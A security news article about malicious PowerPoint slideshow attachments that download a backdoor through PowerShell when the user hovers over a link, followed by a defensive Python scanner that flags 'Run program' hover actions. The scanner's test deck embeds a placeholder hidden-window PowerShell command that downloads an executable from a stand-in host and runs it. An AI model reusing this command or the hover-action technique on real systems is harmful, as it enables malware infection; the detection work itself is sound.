Mousing over a link in PowerPoint will download malware, no macros needed

Don't disable Office Protected View or hovering over this link will download malware


Cybercriminals have devised a way for PowerPoint to download a malicious file when the user merely hovers the mouse over a link. 

Researchers have spotted malicious PowerPoint files, distributed as spam attachments, that take a different approach to infecting a PC through a malicious Office document. Usually these attacks work by tempting the user to open the document and then showing, for example, a blurry image that supposedly requires macros to be enabled before it can be viewed.

This rigged PowerPoint removes the click entirely: it will download malware when the user simply hovers the mouse over a link in the document. That is dangerous because it runs against user expectations and sidesteps the recent security advice of never enabling macros.

The malicious PowerPoint files are presented as invoices or purchase orders, with email subject lines like "RE:Purchase orders #69812" or "Fwd:Confirmation", reports BleepingComputer.

The attachments are in PPSX format, the Office Open XML variant of a PowerPoint file that opens directly in slide show mode rather than in edit mode.

The file shows nothing but the hyperlinked text "Loading… Please wait". If the user moves the mouse over that text, the document launches a PowerShell command that attempts to run an external program and create a backdoor.

Fortunately, Office has a security feature called Protected View, which is enabled by default for email attachments and downloaded files and prevents the PowerShell command from running an external program automatically. With Protected View on, PowerPoint shows a security warning explaining that it has blocked an attempt to run an external program. Users can disable the feature manually, however, and clicking "Enable Editing" on the yellow bar also takes the document out of Protected View; either way the hover action is then free to download the malware.

Security researcher Ruben Daniel Dodge has provided a breakdown of how the attack works. The document uses the PowerPoint element definition for a "hover action", which tells PowerPoint to execute a program as soon as the mouse moves over a specified piece of content, in this case the hyperlinked text, and the program it points to is a PowerShell command.

Once the PowerShell command runs, it contacts a specified domain and downloads several more executable files to set up the backdoor.
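Because the hover action is ordinary Office Open XML rather than a macro, it can be found by inspecting the file without opening it in PowerPoint. The following Python script is an added example (not from the article or from Dodge's write-up): it unzips a PPSX/PPTX in memory, walks each slide's DrawingML for `hlinkMouseOver`, `hlinkHover` and `hlinkClick` elements, resolves their `r:id` through the slide's `.rels` file to get the target, and flags any whose `action` attribute is `ppaction://program` (PowerPoint's "Run program" action). The two-slide deck it scans is constructed inline; the PowerShell command and the `example.invalid` URL embedded in it are placeholders, not taken from the real sample.

```python
"""Scan a PPSX/PPTX for hover or click actions that run a program.

Added example, not from the article. The sample deck is constructed inline;
the embedded PowerShell command and URL are placeholders, not a real sample.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import quote, unquote

A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
P_NS = "http://schemas.openxmlformats.org/presentationml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"

# DrawingML elements that attach an action to a text run or shape.
TRIGGER_TAGS = {"hlinkMouseOver", "hlinkHover", "hlinkClick"}
# PowerPoint's "Run program" action; the command line lives in the slide's .rels file.
RUN_PROGRAM = "ppaction://program"

# Constructed placeholder command (download-and-run pattern; the host does not exist).
CONSTRUCTED_CMD = (
    "powershell -w hidden -c \"Invoke-WebRequest http://example.invalid/stage1.exe "
    "-OutFile $env:TEMP\\s.exe; & $env:TEMP\\s.exe\""
)


def _slide_rels(zf, slide_name):
    """Map relationship Ids to Targets for ppt/slides/slideN.xml."""
    folder, _, fname = slide_name.rpartition("/")
    rels_name = f"{folder}/_rels/{fname}.rels"
    if rels_name not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read(rels_name))
    return {r.get("Id"): r.get("Target", "") for r in root.iter(f"{{{REL_NS}}}Relationship")}


def find_actions(pptx_bytes):
    """Return every hover/click action in the deck, flagging 'Run program' ones."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as zf:
        for name in zf.namelist():
            if not re.fullmatch(r"ppt/slides/slide\d+\.xml", name):
                continue
            rels = _slide_rels(zf, name)
            for el in ET.fromstring(zf.read(name)).iter():
                tag = el.tag.rsplit("}", 1)[-1]
                if tag not in TRIGGER_TAGS:
                    continue
                action = el.get("action", "")
                # Targets in .rels are URL-encoded; decode to recover the command line.
                target = unquote(rels.get(el.get(f"{{{R_NS}}}id"), ""))
                findings.append({
                    "slide": name,
                    "trigger": tag,
                    "action": action,
                    "target": target,
                    "runs_program": action.startswith(RUN_PROGRAM),
                })
    return findings


def _slide_xml(trigger, action_attr):
    """Minimal slide with one text run carrying the given trigger element."""
    action = f' action="{action_attr}"' if action_attr else ""
    return (
        f'<p:sld xmlns:p="{P_NS}" xmlns:a="{A_NS}" xmlns:r="{R_NS}"><p:cSld><p:spTree>'
        f'<p:sp><p:txBody><a:p><a:r><a:rPr lang="en-US">'
        f'<a:{trigger} r:id="rId2"{action}/></a:rPr>'
        f'<a:t>Loading... Please wait</a:t></a:r></a:p></p:txBody></p:sp>'
        f'</p:spTree></p:cSld></p:sld>'
    )


def _rels_xml(target):
    return (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId2" Type="{HLINK_TYPE}" Target="{target}" TargetMode="External"/>'
        f'</Relationships>'
    )


def build_sample_ppsx():
    """Constructed two-slide deck: slide1 runs a program on hover, slide2 is a normal link."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ppt/slides/slide1.xml", _slide_xml("hlinkMouseOver", RUN_PROGRAM))
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", _rels_xml(quote(CONSTRUCTED_CMD, safe="")))
        zf.writestr("ppt/slides/slide2.xml", _slide_xml("hlinkClick", ""))
        zf.writestr("ppt/slides/_rels/slide2.xml.rels", _rels_xml("https://example.com/"))
    return buf.getvalue()


if __name__ == "__main__":
    for f in find_actions(build_sample_ppsx()):
        flag = "RUNS PROGRAM" if f["runs_program"] else "ok"
        print(f"{f['slide']}: {f['trigger']} {f['action'] or '(hyperlink)'} -> {f['target']} [{flag}]")
```

To use it on a real attachment, read the file's bytes and pass them to `find_actions`; an ordinary hyperlink shows up with an empty `action` and an `http(s)` target, while a "Run program" action shows up with `ppaction://program` and a decoded command line. The script only reads the zip members and never executes anything, so it is safe to run on a suspect file on an analysis machine.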

“This PowerPoint Document was interesting to analyze,” notes Dodge. “First of all this document was interesting as it did not rely on Macros, Javascript or VBA for the execution method, which means this document does not conform to the normal exploitation methods.”
